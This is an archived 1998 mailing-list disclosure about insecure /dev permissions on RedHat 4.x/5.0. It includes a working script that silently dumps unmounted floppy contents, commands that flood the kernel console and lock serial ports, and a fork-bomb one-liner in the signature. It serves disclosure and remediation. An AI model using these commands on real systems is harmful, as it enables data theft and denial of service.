RedHat 4.x/5.0 /dev permissions

From: Michał Zalewski (lcamtufat_private)
Date: Wed Feb 04 1998 - 00:45:37 PST

Next message: Rafal Wojtczuk: "An old ld-linux.so hole"

Previous message: Pavel Kankovsky: "serious security problem in XKB--ERRATUM"
Next in thread: Darren J Moffat - Sun UK - Consultant Engineer: "Re: RedHat 4.x/5.0 /dev permissions"
Reply: Darren J Moffat - Sun UK - Consultant Engineer: "Re: RedHat 4.x/5.0 /dev permissions"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

First one
----------

Any user can read data from (even not mounted) floppy using
"cat /dev/fd0H1440". It isn't dangerous itself, but... Any user
may write a script, which periodically checks if floppy has been
just unmounted, then dumps it's content to a file. Here's a sample
'floppy collector':

-- fdumper --
#!/bin/sh
DUMP_DEV=/dev/fd0H1440
MOUNT_DEV=/dev/fd0
LABEL=0
DUMPED=1
while :; do
  sleep 1
  if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then
    if [ "$DUMPED" = "0" ]; then
      echo "Dumping image #$LABEL..."
      cat $DUMP_DEV >.fdimage$LABEL
      let LABEL=LABEL+1
      DUMPED=1
    fi
  else
    DUMPED=0
  fi
done
-- eof --

Also, if there's no floppy in drive, unprivledged user may flood
kernel log console (local console by default!!!):

[user@host sth]$ while :; do cat /dev/fd0H1440;done &

It will generate a lot of kernel messages, which will be logged
to /var/log/messages AND to console (default klogd behaviour). Also,
every printk(...) (called by fd driver) uses sync() to flush buffers.
It will cause abnormal hdd activity.

Second one
-----------
(not tested with rh 5.0)

Ordinary user are allowed to read /dev/ttyS*. Serial ports driver
disallows multiple access attempts at the same time, so user may
permanently lock choosen port using this command:

[user@host user]$ cat /dev/ttyS0
(Ctrl+Z)
[user@host user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy

Now serial port is in unusable state.

That's all?
------------

There are also a lot of other, not-so-common devices, eg. /dev/sequencer,
which are world-readable or even world-writable.

There's no ANY reason to give ordinary users direct access to hardware
devices. It's quite easy (as shown above ;) to obtain an interesting
data or cause system failure by reading/writing these devices.

Solution...
------------

ls -l /dev/* | grep "r-- "
chmod ;)

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
Iterować jest rzeczą ludzką, wykonywać rekursywnie - boską [P. Deustch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=

Next message: Rafal Wojtczuk: "An old ld-linux.so hole"
Previous message: Pavel Kankovsky: "serious security problem in XKB--ERRATUM"
Next in thread: Darren J Moffat - Sun UK - Consultant Engineer: "Re: RedHat 4.x/5.0 /dev permissions"
Reply: Darren J Moffat - Sun UK - Consultant Engineer: "Re: RedHat 4.x/5.0 /dev permissions"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:41:32 PDT